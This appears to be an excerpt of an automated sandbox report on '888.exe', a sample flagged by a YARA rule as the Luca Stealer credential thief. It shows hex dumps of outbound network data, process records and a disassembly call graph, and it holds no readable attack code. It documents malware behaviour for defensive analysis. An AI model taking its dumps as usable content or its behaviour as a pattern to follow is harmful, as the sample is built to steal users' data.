                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: 49 dc 2f 22 90 04 80 6d 6c 63 8b fb 49 e2 b9 d9 46 12 b6 b1 8d 24 22 02 00 db c8 20 09 00 db 3c 90 24 5a 6b 48 02 40 12 f7 b3 8d 6d 4a 29 d8 c6 36 0f 64 1b db d4 5a 91 c4 fd 32 13 00 db 48 22 22 b0 8d 6d 00 24 01 60 1b 80 30 64 26 b6 91 84 24 24 61 1b db 98 46 44 60 1b db 00 48 02 a0 b5 46 29 05 db d8 c6 36 92 28 a5 60 9b d6 1a d2 f7 ad cc 7f a6 a3 4b 70 74 09 ce 3d 03 ce 3e 03 00 36 8f c1 e9 07 c1 e9 07 c1 c6 36 57 fd db d9 e2 85 11 85 07 b2 78 0e 51 0a 0f 14 24 00 92 78 b6 c4 36 b6 b1 8d 6d 6c 03 c9 b3 d8 60 03 80 cd b3 44 70 59 9a e7 2f f8 77 b1 f9 f7 08 c4 0b 63 9b ff 2a b6 f9 d7 92 f9 4f 65 9b ff 4c b2 91 f9 4f 63 9b ff 4c 32 cf 62 9b fb d9 06 40 12 ff 12 db dc 4f 12 00 b6 79 51 84 f9 37 b1 cd 15 c1 7f 26 db bc 30 32 ff 2e b6 f9 ef 14 3c 2f db bc a8
                                                                      Data Ascii: I/"mlcIF$" <$ZkH@mJ)6dZ2H""m$`0d&$$aFD`HF)6(`Kpt=>66WxQ$x6ml`DpY/wc*OeLOcL2b@OyQ7&02.</
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: b0 4d 66 02 20 09 49 d8 06 20 33 01 90 84 24 9e 9b 6d 6c 23 89 88 00 20 33 c9 4c 00 22 02 49 c8 5c 66 9b cc 24 33 c1 a6 d4 0a 40 41 00 d8 c6 36 b6 b1 4d ad 95 cc c4 36 00 92 00 90 04 80 24 6c 63 1b 49 48 02 a0 b5 46 6b 8d ae eb 68 ad 01 10 11 48 a2 b5 86 6d 22 82 40 dc cf 36 92 90 84 6d a6 69 a2 d6 4a 66 22 89 88 c0 36 ad 35 c8 44 12 a5 14 6c 63 1b 00 db 48 22 22 88 08 a6 61 44 12 00 b6 b9 5f 29 85 88 00 c0 36 99 89 6d 9e 5b 44 c5 36 b6 c9 4c 1e 48 12 d3 38 02 a0 08 22 82 88 e0 7e b6 21 cd fd 24 61 1b db 48 a2 94 c2 34 4d dc 4f 12 f7 b3 4d 66 12 11 48 02 c0 36 99 89 24 22 82 88 c0 53 03 40 12 b6 01 90 84 24 24 d1 5a c3 36 99 89 24 24 21 09 db 64 26 a5 14 24 21 09 db 64 26 b6 89 08 22 82 69 1c 89 08 6c 33 4d 13 11 41 df f7 48 62 9a 26 a6 69 a2 94 82 24 6c
                                                                      Data Ascii: Mf I 3$ml# 3L"I\f$3@A6M6$lcIHFkhHm"@6miJf"65DlcH""aD_)6m[D6LH8"~!$aH4MOMfH6$"S@$$Z6$$!d&$!d&"il3MAHb&i$l
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: a7 34 ff 93 d9 e6 df c3 36 00 32 ff 29 6c f3 ef 11 e6 df c5 36 ff 99 6c f1 c2 c8 bc 50 b6 91 44 70 85 6d 00 24 01 60 9b 17 c6 36 ff a9 d2 fc 7b c8 c1 0b 63 9b 17 2e 79 61 6c f3 c2 84 83 e7 66 9b fb c9 fc 87 b2 cd 03 05 ff 3e b6 f9 f7 90 79 a1 6c 03 20 89 07 b2 0d 80 0c b6 79 7e 24 01 60 9b 17 24 31 00 32 2f 54 f0 6f 63 1b 00 99 67 b1 cd fd 24 f1 dc 6c f3 9f c1 36 f7 b3 0d 40 49 fe 5d 6c f3 c2 88 e7 64 9b 7f 0d db bc 30 61 9e 2f db 00 c8 20 09 00 db 00 48 02 c0 36 2f 88 6d 00 6c 23 89 fb 49 e2 81 64 f3 42 a5 f9 97 d8 e6 81 24 61 9b 7f 2d db d8 06 40 12 92 b0 0d 40 20 ee 67 9b 67 69 89 6d 00 24 11 11 dc cf 36 d8 3c 37 db dc 4f 32 00 92 00 c8 4c 6c 03 10 11 64 26 f7 b3 cd 73 eb a2 60 1b 00 db d8 e6 45 65 9b 90 78 61 22 82 d6 1a 99 89 24 22 02 49 d8 26 33 01
                                                                      Data Ascii: 462)l6lPDpm$`6{c.yalf>yl y~$`$12/Tocg$l6@I]ld0a/ H6/ml#IdB$a-@@ ggim$6<7O2Lld&s`Eexa"$"I&3
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: ff 91 de e2 e3 7e 0d ae 7d 28 1c bf 8e 67 0b fe 3d c2 fc bb 7c c5 a3 ff 96 8f ba e9 ef 51 cc c1 09 24 d8 e0 04 12 9c 0c b3 47 f3 1b f7 be 24 df f2 67 7b fc ee ad 4b de f0 e1 1b bc c3 8b 6f f1 46 0f eb 39 7f ee 1c e3 38 10 ed 02 37 3c e8 25 b9 df a5 4b 97 d8 da da 02 40 12 00 f5 4d 5f 93 fc e5 df 07 e0 0f ee d8 e7 0d fe 78 8b ff 6e 32 2f b2 6f 1d 7f 88 f7 7e ef f7 a6 b5 c6 fd 66 9f f9 54 56 9f f3 30 ee 27 c0 36 97 56 c9 a3 be fa 36 8e cd 83 3f f9 e0 9b 38 be 08 2e 33 97 99 e7 c7 60 58 7c ce d3 39 fa ac 87 70 bf ae 56 be fa 6b be 86 4f bc e6 03 f9 8f e6 14 ff 9d c4 bf 4f 98 17 49 8a e7 cf c1 73 93 04 80 05 b6 b9 cc e6 39 84 c0 10 08 db dc cf 98 cb 24 00 6a ad dc 4f 12 cf 2b b0 4d e6 84 6d dc 12 6c a0 81 8d 14 00 d8 0d 6c 9e cd 00 84 0b ff 1e b6 f9 af 64 9b
                                                                      Data Ascii: ~}(g=|Q$G$g{KoF987<%K@M_xn2/o~fTV0'6V6?8.3`X|9pVkOOIs9$jO+Mmlld
                                                                      2024-12-13 11:41:06 UTC16384OUTData Raw: f1 8c 67 70 ec d8 31 e6 f3 39 7d df 03 50 df f4 35 c9 5f fe 7d 00 fe e0 8e 7d 5e ff 4f b7 51 9a 7f 9f e4 5f 4b 12 cf 8f 6d 5e 98 af db fb 1e 3e e8 03 3f 88 71 9a b8 df c6 e7 3c 9d ff 0c 87 9f f9 60 ee d7 75 95 2f f9 92 2f e5 33 6e f9 48 9e 9b f8 77 72 f0 fc d8 e6 45 21 89 07 b2 cd bf 86 f8 8f 65 9b ff 52 0e 5e 98 20 f9 d7 09 1e 28 33 01 90 04 80 28 3c 90 69 fc 5b c8 60 01 0e 5e 18 8b 2b 24 24 21 09 49 00 48 22 22 b0 78 16 19 6c 63 1b db 64 26 00 ce 04 1b d2 60 03 00 89 48 9e 1f db 00 48 e2 85 91 c1 36 ff 66 0e fe 25 b6 01 c0 06 00 09 00 49 60 f3 a2 b0 cd bf 9b cd 73 8b e4 df c5 36 ff 95 6c f3 40 c1 bf 53 8a 17 c6 36 ff b9 92 7f 0f db bc 28 64 9e af 30 cf 62 9b 7f 2f db 3c 90 f8 d7 b3 cd 7f 95 68 e2 45 65 9b 7f 89 6d fe 23 c9 60 9b e7 47 12 b6 79 7e 82 2b
                                                                      Data Ascii: gp19}P5_}}^OQ_Km^>?q<`u//3nHwrE!eR^ (3(<i[`^+$$!IH""xlcd&`HH6f%I`s6l@S6(d0b/<hEem#`Gy~+
                                                                      2024-12-13 11:41:09 UTC389INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0
                                                                      Date: Fri, 13 Dec 2024 11:41:09 GMT
                                                                      Content-Type: application/json
                                                                      Content-Length: 1222
                                                                      Connection: close
                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                      Access-Control-Allow-Origin: *
                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:06:40:16
                                                                      Start date:13/12/2024
                                                                      Path:C:\Users\user\Desktop\888.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\888.exe"
                                                                      Imagebase:0xa50000
                                                                      File size:4'885'504 bytes
                                                                      MD5 hash:B6E5859C20C608BF7E23A9B4F8B3B699
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:3
                                                                      Start time:06:40:55
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"
                                                                      Imagebase:0x5a0000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:06:40:55
                                                                      Start date:13/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff620390000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:2.7%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:13.2%
                                                                        Total number of Nodes:642
                                                                        Total number of Limit Nodes:3
                                                                        execution_graph 1823 a71280 1824 a712a5 1823->1824 1825 a71293 RtlReAllocateHeap 1823->1825 1827 a712b0 GetProcessHeap 1824->1827 1828 a712bf HeapAlloc 1824->1828 1826 a71305 1825->1826 1827->1826 1829 a712ba 1827->1829 1828->1826 1830 a712d1 1828->1830 1829->1828 1831 a712ef HeapFree 1830->1831 1831->1826 1832 c79d40 SetThreadStackGuarantee 1833 c79d82 GetLastError 1832->1833 1835 c79d8c 1832->1835 1834 c79df7 1833->1834 1833->1835 1844 d9bef0 1834->1844 1837 c79dd1 HeapFree 1835->1837 1840 c79dc2 HeapFree 1835->1840 1840->1837 1847 c7e9e0 1844->1847 1848 c7e9fe 1847->1848 1849 c7e9ea 1847->1849 1872 c7ea20 1848->1872 1853 d9c040 1849->1853 1854 d9bef0 78 API calls 1853->1854 1855 d9c07f 1854->1855 1875 d9c0b0 1855->1875 1891 c7ea30 1872->1891 1876 d9c108 1875->1876 1877 d9c167 1875->1877 1878 d9bef0 78 API calls 1876->1878 1879 d9bef0 78 API calls 1877->1879 1878->1877 1880 d9c1f6 1879->1880 1881 d9bef0 78 API calls 1880->1881 1882 d9c25f 1881->1882 1883 d9bef0 78 API calls 1882->1883 1884 d9c2a6 1883->1884 1885 d9bef0 78 API calls 1884->1885 1886 d9c2f6 1885->1886 1887 d9bef0 78 API calls 1886->1887 1888 d9c371 1887->1888 1889 d9bef0 78 API calls 1888->1889 1890 d9c3cf 1889->1890 1893 c7ea6d 1891->1893 1892 c7eaaf 1894 c7eb20 77 API calls 1892->1894 1893->1892 1899 c7eb20 1893->1899 1896 c7eae2 1894->1896 1897 c7ea25 1896->1897 1898 c7eb00 HeapFree 1896->1898 1898->1897 1900 c7eb77 1899->1900 1946 c7f06a 1899->1946 1950 c63bc0 1900->1950 1901 c61d20 2 API calls 1903 c7f0e5 1901->1903 1906 c61e80 2 API calls 1903->1906 1904 c7eb80 1905 c7eba1 1904->1905 1974 d9c300 1904->1974 1908 c7f0f0 1905->1908 1909 c7ebab AcquireSRWLockShared 1905->1909 1911 c7f13d 1906->1911 1910 c61d20 2 API calls 1908->1910 1912 c7ebfb 1909->1912 1945 c7ec92 1909->1945 1910->1903 1913 c7f171 1911->1913 1916 c62260 2 API calls 1911->1916 1914 c7ec27 1912->1914 1915 c7edcc 1912->1915 1913->1892 1914->1945 1979 c62420 1914->1979 1917 c63bc0 74 API calls 1915->1917 1916->1913 1918 c7edd5 1917->1918 1920 c7ede3 1918->1920 1918->1945 1919 c7ed7d ReleaseSRWLockShared 1921 c63bc0 74 API calls 1919->1921 1922 d9c300 74 API calls 1920->1922 1921->1945 1933 c7edc4 1922->1933 1925 c7eda3 1926 d9c300 74 API calls 1925->1926 1926->1933 1928 da6bb0 74 API calls 1928->1933 1931 c7ef5a AcquireSRWLockExclusive 1934 c7ef76 1931->1934 1935 c7ef7f 1931->1935 1933->1928 1936 c7efcd ReleaseSRWLockExclusive 1933->1936 1943 c7f053 1933->1943 1947 b3d250 2 API calls 1933->1947 1948 d9c300 74 API calls 1933->1948 1941 c7df60 74 API calls 1934->1941 2054 da6bb0 1935->2054 1939 c6fde0 74 API calls 1936->1939 1937 c7ef16 1940 d9c300 74 API calls 1937->1940 1939->1933 1940->1933 1941->1933 1943->1946 1949 b3d250 2 API calls 1943->1949 1945->1919 1945->1925 1945->1931 1945->1933 1945->1937 1986 c7df60 1945->1986 1999 c62260 1945->1999 2005 b3d250 1945->2005 2010 c61d20 1945->2010 2015 c61e80 1945->2015 2020 c71340 1945->2020 2022 c6fde0 1945->2022 1946->1901 1947->1933 1948->1933 1949->1946 1951 c63bce TlsGetValue 1950->1951 1952 c63c58 1950->1952 1955 c63bdb 1951->1955 2069 da6800 1952->2069 1956 c63be1 1955->1956 1957 c63bef TlsGetValue 1955->1957 1958 da6800 74 API calls 1955->1958 1956->1904 1960 c63c54 1957->1960 1961 c63bfc 1957->1961 1958->1957 1960->1904 1962 c63c3d 1961->1962 2063 a71220 1961->2063 1962->1904 1965 c63c82 2086 d9bae0 1965->2086 1966 c63c1c 1967 c63c34 TlsSetValue 1966->1967 1970 da6800 74 API calls 1966->1970 1967->1962 1970->1967 1971 c63d09 1971->1904 1972 c63c91 1972->1971 1973 c63cfa HeapFree 1972->1973 1973->1971 1975 d9bef0 78 API calls 1974->1975 1976 d9c371 1975->1976 1977 d9bef0 78 API calls 1976->1977 1978 d9c3cf 1977->1978 2333 c626e0 1979->2333 1981 c62452 1983 c6246a 1981->1983 2362 c61b80 1981->2362 1983->1945 1984 c62465 1984->1983 1985 d9bef0 78 API calls 1984->1985 1985->1983 1992 c7dfeb 1986->1992 1987 c7e05b 1988 c7e1a6 1987->1988 1989 c7e131 1987->1989 1990 c7e07b 1987->1990 1997 c7e08f 1987->1997 1988->1945 1993 c7e830 74 API calls 1989->1993 2418 c7e830 AcquireSRWLockExclusive 1990->2418 1991 c7e04a HeapFree 1991->1987 1992->1987 1992->1991 1995 c7e03b HeapFree 1992->1995 1993->1997 1995->1991 1996 c7e195 HeapFree 1996->1988 1997->1988 1997->1996 1998 c7e186 HeapFree 1997->1998 1998->1996 2000 c62282 1999->2000 2001 c6226a 1999->2001 2003 c6229c 2000->2003 2004 c6228d HeapFree 2000->2004 2001->2000 2002 c62273 HeapFree 2001->2002 2002->2000 2003->1945 2004->2003 2006 b3d26a 2005->2006 2007 b3d259 HeapFree 2005->2007 2008 b3d284 2006->2008 2009 b3d275 HeapFree 2006->2009 2007->2006 2008->1945 2009->2008 2011 c61d70 2010->2011 2012 c61d7a 2011->2012 2013 c61de7 HeapFree 2011->2013 2014 c61dd8 HeapFree 2011->2014 2012->1945 2013->2012 2014->2013 2016 c61f08 2015->2016 2018 c61eb2 2015->2018 2016->1945 2017 c61ef9 HeapFree 2017->2016 2018->2017 2019 c61eea HeapFree 2018->2019 2019->2017 2425 c7134f 2020->2425 2023 c6fdef TlsGetValue 2022->2023 2024 c6fe98 2022->2024 2027 c6fdfc 2023->2027 2026 da6800 72 API calls 2024->2026 2026->2023 2028 c6fe04 2027->2028 2029 c6fe19 TlsGetValue 2027->2029 2030 da6800 72 API calls 2027->2030 2028->1945 2029->2028 2032 c6fe26 2029->2032 2030->2029 2033 a71220 3 API calls 2032->2033 2037 c6fe67 2032->2037 2034 c6fe42 2033->2034 2035 c6fe46 2034->2035 2036 c6fec2 2034->2036 2038 c6fe5e TlsSetValue 2035->2038 2041 da6800 72 API calls 2035->2041 2039 d9bae0 72 API calls 2036->2039 2037->2028 2040 b3d250 2 API calls 2037->2040 2038->2037 2043 c6fed1 2039->2043 2040->2028 2041->2038 2044 c6ff18 TlsSetValue 2043->2044 2046 da6800 72 API calls 2043->2046 2047 c6ff59 HeapFree 2044->2047 2050 c6ff45 2044->2050 2046->2044 2048 c6ff71 2047->2048 2049 c6ff6e 2047->2049 2052 da6800 72 API calls 2048->2052 2051 c6ff83 TlsSetValue 2049->2051 2050->2047 2053 b3d250 2 API calls 2050->2053 2051->1945 2052->2051 2053->2047 2055 c63bc0 78 API calls 2054->2055 2056 da6bb6 2055->2056 2057 da6bba 2056->2057 2058 d9c300 78 API calls 2056->2058 2057->1934 2059 da6be0 2058->2059 2060 da6bea 2059->2060 2458 da6430 2059->2458 2060->1934 2062 da6c26 2062->1934 2064 a71240 GetProcessHeap 2063->2064 2065 a7122f 2063->2065 2064->2065 2068 a71264 2064->2068 2066 a71254 RtlAllocateHeap 2065->2066 2067 a71234 RtlAllocateHeap 2065->2067 2066->2068 2067->2068 2068->1965 2068->1966 2070 da680e InitOnceBeginInitialize 2069->2070 2071 da6881 TlsAlloc 2069->2071 2072 da68bc 2070->2072 2073 da6835 2070->2073 2074 da691b 2071->2074 2075 da6893 2071->2075 2129 da6950 2072->2129 2077 da683c TlsAlloc 2073->2077 2079 da689e 2073->2079 2132 da6980 2074->2132 2075->2079 2080 da68a7 TlsFree 2075->2080 2081 da68da InitOnceComplete 2077->2081 2082 da684b InitOnceComplete 2077->2082 2079->1951 2080->2079 2084 d9bef0 72 API calls 2081->2084 2082->2079 2084->2074 2135 a71340 2086->2135 2088 d9bb60 2173 a6e560 2088->2173 2090 d9bb65 2090->1972 2091 d9baeb 2091->2088 2167 a6e630 2091->2167 2094 d9bb70 2095 d9bae0 77 API calls 2094->2095 2096 d9bb79 2095->2096 2097 d9bef0 77 API calls 2096->2097 2098 d9bbdf 2097->2098 2099 d9bef0 77 API calls 2098->2099 2100 d9bc3f 2099->2100 2101 d9bef0 77 API calls 2100->2101 2102 d9bc9f 2101->2102 2103 d9bef0 77 API calls 2102->2103 2106 d9bcff 2102->2106 2103->2106 2104 d9bd6f 2105 a6e560 77 API calls 2104->2105 2107 d9bd74 2105->2107 2106->2104 2178 a815e9 2106->2178 2107->1972 2110 d9bd80 2111 d9bae0 77 API calls 2110->2111 2112 d9bd89 2111->2112 2113 d9bef0 77 API calls 2112->2113 2114 d9bdd3 2113->2114 2115 d9bef0 77 API calls 2114->2115 2116 d9be22 2115->2116 2117 a71220 3 API calls 2116->2117 2118 d9be3e 2117->2118 2119 d9beae 2118->2119 2120 d9be42 2118->2120 2122 d9bae0 77 API calls 2119->2122 2121 d9be6a 2120->2121 2123 d9be8b HeapFree 2120->2123 2124 d9bebd 2120->2124 2121->1972 2122->2124 2123->2121 2125 d9c0b0 77 API calls 2124->2125 2126 d9beec 2125->2126 2127 c7e9e0 77 API calls 2126->2127 2128 d9bf18 2127->2128 2130 d9c0b0 78 API calls 2129->2130 2131 da697e 2130->2131 2133 d9c0b0 78 API calls 2132->2133 2134 da69b2 2133->2134 2185 c80240 2135->2185 2137 a71802 2141 d9c200 78 API calls 2137->2141 2138 a717d3 2223 d9bfe0 2138->2223 2140 a71810 2149 d9bfe0 78 API calls 2140->2149 2141->2140 2142 a71345 2142->2137 2142->2138 2142->2140 2143 a71735 2142->2143 2144 a717e1 2142->2144 2145 a717f2 2142->2145 2148 a7181e 2142->2148 2150 a71727 2142->2150 2152 a7182a 2142->2152 2154 a716bb 2142->2154 2220 d9bf80 2142->2220 2146 a7173d 2143->2146 2155 d9bf80 78 API calls 2143->2155 2226 d9c200 2144->2226 2151 d9bfe0 78 API calls 2145->2151 2146->2150 2156 d9bf80 78 API calls 2146->2156 2153 d9c200 78 API calls 2148->2153 2149->2148 2150->2091 2151->2137 2159 d9bfe0 78 API calls 2152->2159 2153->2152 2158 a716e1 2154->2158 2160 d9bf80 78 API calls 2154->2160 2155->2146 2156->2138 2161 a716f2 2158->2161 2164 d9bf80 78 API calls 2158->2164 2162 a7183c 2159->2162 2160->2158 2161->2150 2166 d9bf80 78 API calls 2161->2166 2163 a71853 2162->2163 2237 d9bcff 2162->2237 2163->2091 2164->2161 2166->2143 2168 a6e63c 2167->2168 2170 a6e665 2167->2170 2169 a6e670 2168->2169 2168->2170 2171 a6e650 RtlReAllocateHeap 2168->2171 2169->2170 2172 a71220 3 API calls 2169->2172 2170->2088 2170->2090 2170->2094 2171->2170 2172->2170 2174 d9bef0 77 API calls 2173->2174 2175 a6e596 2174->2175 2176 a6e5ba 2175->2176 2177 a6e5a9 HeapFree 2175->2177 2176->2090 2177->2176 2179 a815f6 2178->2179 2182 a81616 2178->2182 2180 a8160d 2179->2180 2181 a81624 2179->2181 2179->2182 2324 a71280 2180->2324 2181->2182 2184 a71220 3 API calls 2181->2184 2182->2104 2182->2107 2182->2110 2184->2182 2263 c80230 2185->2263 2187 c8024b 2188 c80261 TlsGetValue 2187->2188 2190 da6800 72 API calls 2187->2190 2191 c8026e 2188->2191 2190->2188 2192 c80276 2191->2192 2193 c80284 TlsGetValue 2191->2193 2194 da6800 72 API calls 2191->2194 2192->2142 2193->2192 2196 c8029a 2193->2196 2194->2193 2197 c80306 2196->2197 2199 a71220 3 API calls 2196->2199 2300 da6ee0 2197->2300 2200 c802b6 2199->2200 2201 c80349 2200->2201 2202 c802be 2200->2202 2204 d9bae0 72 API calls 2201->2204 2203 c802e0 TlsSetValue 2202->2203 2206 da6800 72 API calls 2202->2206 2203->2197 2207 c80358 2204->2207 2205 c8030b 2205->2192 2318 c79d00 2205->2318 2206->2203 2210 c80398 TlsSetValue 2207->2210 2212 da6800 72 API calls 2207->2212 2213 c803d9 HeapFree 2210->2213 2214 c803c5 2210->2214 2212->2210 2215 c803ee 2213->2215 2216 c803f1 2213->2216 2214->2213 2219 c79d00 3 API calls 2214->2219 2217 c80403 TlsSetValue 2215->2217 2218 da6800 72 API calls 2216->2218 2217->2142 2218->2217 2219->2213 2221 d9bef0 78 API calls 2220->2221 2222 d9bfdf 2221->2222 2224 d9bef0 78 API calls 2223->2224 2225 d9c03f 2224->2225 2227 d9bef0 78 API calls 2226->2227 2228 d9c25f 2227->2228 2229 d9bef0 78 API calls 2228->2229 2230 d9c2a6 2229->2230 2231 d9bef0 78 API calls 2230->2231 2232 d9c2f6 2231->2232 2233 d9bef0 78 API calls 2232->2233 2234 d9c371 2233->2234 2235 d9bef0 78 API calls 2234->2235 2236 d9c3cf 2235->2236 2238 d9bd0b 2237->2238 2239 d9bd6f 2237->2239 2242 a815e9 7 API calls 2238->2242 2240 a6e560 77 API calls 2239->2240 2241 d9bd74 2240->2241 2241->2163 2243 d9bd58 2242->2243 2243->2239 2243->2241 2244 d9bd80 2243->2244 2245 d9bae0 77 API calls 2244->2245 2246 d9bd89 2245->2246 2247 d9bef0 77 API calls 2246->2247 2248 d9bdd3 2247->2248 2249 d9bef0 77 API calls 2248->2249 2250 d9be22 2249->2250 2251 a71220 3 API calls 2250->2251 2252 d9be3e 2251->2252 2253 d9beae 2252->2253 2254 d9be42 2252->2254 2256 d9bae0 77 API calls 2253->2256 2255 d9be6a 2254->2255 2257 d9be8b HeapFree 2254->2257 2258 d9bebd 2254->2258 2255->2163 2256->2258 2257->2255 2259 d9c0b0 77 API calls 2258->2259 2260 d9beec 2259->2260 2261 c7e9e0 77 API calls 2260->2261 2262 d9bf18 2261->2262 2264 c7de20 HeapFree HeapFree HeapFree HeapFree 2263->2264 2265 c80235 2264->2265 2266 c80230 72 API calls 2265->2266 2267 c8024b 2266->2267 2268 c80261 TlsGetValue 2267->2268 2270 da6800 72 API calls 2267->2270 2271 c8026e 2268->2271 2270->2268 2272 c80284 TlsGetValue 2271->2272 2273 da6800 72 API calls 2271->2273 2290 c80276 2271->2290 2275 c8029a 2272->2275 2272->2290 2273->2272 2276 c80306 2275->2276 2278 a71220 RtlAllocateHeap GetProcessHeap RtlAllocateHeap 2275->2278 2277 da6ee0 72 API calls 2276->2277 2283 c8030b 2277->2283 2279 c802b6 2278->2279 2280 c80349 2279->2280 2281 c802be 2279->2281 2282 d9bae0 72 API calls 2280->2282 2284 da6800 72 API calls 2281->2284 2287 c802e0 TlsSetValue 2281->2287 2289 c80358 2282->2289 2286 c79d00 HeapFree HeapFree HeapFree 2283->2286 2283->2290 2284->2287 2286->2290 2287->2276 2288 c80398 TlsSetValue 2293 c803d9 HeapFree 2288->2293 2294 c803c5 2288->2294 2289->2288 2292 da6800 72 API calls 2289->2292 2290->2187 2292->2288 2295 c803ee 2293->2295 2296 c803f1 2293->2296 2294->2293 2299 c79d00 HeapFree HeapFree HeapFree 2294->2299 2297 c80403 TlsSetValue 2295->2297 2298 da6800 72 API calls 2296->2298 2297->2187 2298->2297 2299->2293 2301 c62420 78 API calls 2300->2301 2302 da6f12 2301->2302 2303 da6f7b 2302->2303 2304 da6f19 2302->2304 2306 d9c380 78 API calls 2303->2306 2305 c7ca40 78 API calls 2304->2305 2307 da6f25 2305->2307 2308 da6f8f 2306->2308 2307->2308 2309 da6f2b 2307->2309 2310 d9c300 78 API calls 2308->2310 2311 a71220 RtlAllocateHeap GetProcessHeap RtlAllocateHeap 2309->2311 2312 da6fac 2310->2312 2313 da6f41 2311->2313 2314 da6fe7 2312->2314 2316 c62260 HeapFree HeapFree 2312->2316 2315 da6f45 2313->2315 2317 d9bae0 78 API calls 2313->2317 2314->2205 2315->2205 2316->2314 2317->2312 2319 c79d15 2318->2319 2320 c79d0d 2318->2320 2322 c79d31 2319->2322 2323 c79d22 HeapFree 2319->2323 2321 c62260 HeapFree HeapFree 2320->2321 2321->2319 2322->2192 2323->2322 2325 a712a5 2324->2325 2326 a71293 RtlReAllocateHeap 2324->2326 2328 a712b0 GetProcessHeap 2325->2328 2329 a712bf HeapAlloc 2325->2329 2327 a71305 2326->2327 2327->2182 2328->2327 2330 a712ba 2328->2330 2329->2327 2331 a712d1 2329->2331 2330->2329 2332 a712ef HeapFree 2331->2332 2332->2327 2334 c62798 2333->2334 2338 c626ef TlsGetValue 2333->2338 2335 da6800 75 API calls 2334->2335 2335->2338 2337 c626fc 2339 c62704 2337->2339 2340 c62719 TlsGetValue 2337->2340 2342 da6800 75 API calls 2337->2342 2338->2337 2339->1981 2340->2339 2343 c62726 2340->2343 2342->2340 2344 a71220 3 API calls 2343->2344 2348 c62767 2343->2348 2345 c62742 2344->2345 2346 c62746 2345->2346 2347 c627c2 2345->2347 2350 c6275e TlsSetValue 2346->2350 2352 da6800 75 API calls 2346->2352 2351 d9bae0 75 API calls 2347->2351 2348->2339 2349 c62260 2 API calls 2348->2349 2349->2339 2350->2348 2354 c627d1 2351->2354 2352->2350 2355 c62802 2354->2355 2356 c627f2 2354->2356 2373 a7a170 2355->2373 2357 c627f7 2356->2357 2378 a803c0 2356->2378 2357->1981 2359 c62809 2359->1981 2361 c62814 2361->1981 2363 a71220 3 API calls 2362->2363 2364 c61bc7 2363->2364 2365 c61bce 2364->2365 2366 c61c49 2364->2366 2370 c61c16 2365->2370 2392 da6a40 2365->2392 2367 d9bae0 77 API calls 2366->2367 2369 c61c47 2367->2369 2368 c61ca0 2368->1984 2369->2368 2372 c61c8f HeapFree 2369->2372 2370->1984 2372->2368 2374 a7a190 2373->2374 2374->2374 2375 a7a1c0 2374->2375 2389 d9bf20 2374->2389 2375->2359 2379 a803e0 2378->2379 2379->2379 2380 a80410 2379->2380 2381 d9bf20 78 API calls 2379->2381 2380->2361 2382 a8044e 2381->2382 2383 a804bc 2382->2383 2384 d9bf20 78 API calls 2382->2384 2383->2361 2385 a804fd 2384->2385 2386 a8056c 2385->2386 2387 d9bf20 78 API calls 2385->2387 2386->2361 2388 a805ad 2387->2388 2388->2361 2390 d9bef0 78 API calls 2389->2390 2391 d9bf7f 2390->2391 2393 d9bef0 78 API calls 2392->2393 2396 da6a76 2393->2396 2394 da6afa 2395 a6e560 78 API calls 2394->2395 2397 da6aff 2395->2397 2396->2394 2411 c64830 2396->2411 2397->2369 2400 da6b0b 2401 d9bae0 78 API calls 2400->2401 2404 da6b14 2401->2404 2402 da6b90 2403 a6e560 78 API calls 2402->2403 2405 da6b95 2403->2405 2404->2402 2406 c64830 7 API calls 2404->2406 2405->2369 2407 da6b76 2406->2407 2407->2402 2407->2405 2408 da6ba0 2407->2408 2409 d9bae0 78 API calls 2408->2409 2410 da6ba9 2409->2410 2412 c6483d 2411->2412 2415 c6485d 2411->2415 2413 c64875 2412->2413 2414 c64854 2412->2414 2412->2415 2413->2415 2417 a71220 3 API calls 2413->2417 2416 a71280 4 API calls 2414->2416 2415->2394 2415->2397 2415->2400 2416->2415 2417->2415 2419 c7e906 2418->2419 2421 c7e87f 2418->2421 2420 da6bb0 76 API calls 2419->2420 2420->2421 2422 c7e8ea ReleaseSRWLockExclusive 2421->2422 2423 da6bb0 76 API calls 2421->2423 2422->1997 